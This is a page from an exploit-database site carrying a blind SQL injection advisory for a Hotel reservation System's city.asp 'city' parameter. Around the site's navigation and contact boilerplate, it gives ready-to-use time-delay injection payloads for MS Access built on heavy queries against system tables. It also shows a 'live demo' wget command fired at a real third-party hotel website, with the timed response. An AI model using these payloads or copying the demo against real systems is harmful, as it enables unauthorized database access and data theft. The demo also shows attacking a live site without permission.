0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Hotel reservation System (city.asp city) Blind SQL Injection Vulnerability
[==========================================================================
Hotel reservation System (city.asp city) Blind SQL Injection Vulnerability
==========================================================================
# Hotel reservation System (city.asp city) Blind SQL Injection Vulnerability
# url: http://www.softacid.net/scripts/web-hotel-reservation-system.asp
#
# Author: JosS
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website
(blind-way): http://www.localhost/city.asp?city=['foo]
NOTE: differents injections for each database.
NOTE (2): the Engine Microsoft Access hasn't functions time delay (not benchmark, not waitfor).
Ingenious function (Consultations heavy that generate delays of time):
"MS ACCESS 97, 2000"
1) * (select max(1) from MSysAccessObjects)
2) and (SELECT count(*) from MSysAccessObjects t1, MSysAccessObjects t2, MSysAccessObjects t3,
MSysAccessObjects t4, MSysAccessObjects t5, MSysAccessObjects t6) > 0 and exists (select * from MSysAccessObjects)
"MS ACCESS 2003, 2007"
1) * (select max(1) from MSysAccessStorage)
2) and (SELECT count(*) from MSysAccessStorage t1, MSysAccessStorage t2, MSysAccessStorage t3,
MSysAccessStorage t4, MSysAccessStorage t5, MSysAccessStorage t6) > 0 and exists (select * from MSysAccessStorage)
live demo:
heavy consultation (23:35:51<-->23:36:26):
[quote]
-------------------------------------------------------------------------------------------------------------
joss@h4x0rz:~$ wget -v "http://www.hotelsk.net/city.asp?city=921%20and (SELECT count(*) from
MSysAccessStorage t1, MSysAccessStorage t2, MSysAccessStorage t3, MSysAccessStorage t4,
MSysAccessStorage t5, MSysAccessStorage t6) > 0 and exists (select * from MSysAccessStorage)"
-O result.txt --23:35:51-- http://www.hotelsk.net/city.asp?city=921%20and%20(SELECT%20count(*)%20from%20
MSysAccessStorage%20t1,%20MSysAccessStorage%20t2,%20MSysAccessStorage%20t3,%20MSysAccessStorage%20t4,
%20MSysAccessStorage%20t5,%20MSysAccessStorage%20t6)%20%3E%200%20and%20exists%20(select%20*%20from%20MSysAccessStorage)
=> `result.txt'
Resolviendo www.hotelsk.net... 67.15.59.114
Connecting to www.hotelsk.net|67.15.59.114|:80... conectado.
Peticion HTTP enviada, esperando respuesta... 200 OK
Longitud: 4,465 (4.4K) [text/html]
100%[====================================>] 4,465 18.53K/s
23:36:26 (18.53 KB/s) - `result.txt' saved [4465/4465]
------------------------------------------------------------------------------------------------------------
[/quote]
work funny :D - In memory of rgod
# 0day.today [2024-12-23] #